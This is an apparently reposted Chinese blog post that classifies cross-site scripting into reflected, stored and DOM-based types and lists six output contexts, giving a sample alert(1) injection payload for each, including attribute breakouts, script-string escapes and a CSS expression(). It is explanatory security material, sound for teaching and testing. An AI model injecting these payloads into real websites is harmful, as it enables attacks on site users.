版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/cemao4548/article/details/81194659
XSS存在的常见形态
xss分为 反射、存储、based Dom三种类型
按照输出位置区分,有六种常见输出类型,下文列举。
html中输出
将用户可控变量记做$var
则有<div>$var</div>
型
payload如<img src=1 onerror=alert(1)>
标签属性中输出
形如<div name="$var"></div>
payload<div name="
"><script>alert(1)</script><"
"></div>
标签事件中输出
形如<img src=1 onerror="funcA('$var')">
payload <img src=1 onerror="funcA('
');alert(1);//'
)">
script标签中输出
形如<script>var x = "$var";</script>
payload
<script>var x = "
";alert(1);
</script>
css中输出
形如<div style="$var">
payload <div style="
width:expression(alert('xss'));
">
url中输出
形如<a href="htpp://www.baidu.com/index.php?id=$var">
payload<a href="htpp://www.baidu.com/index.php?id=
1" onclick=alert(1)"
">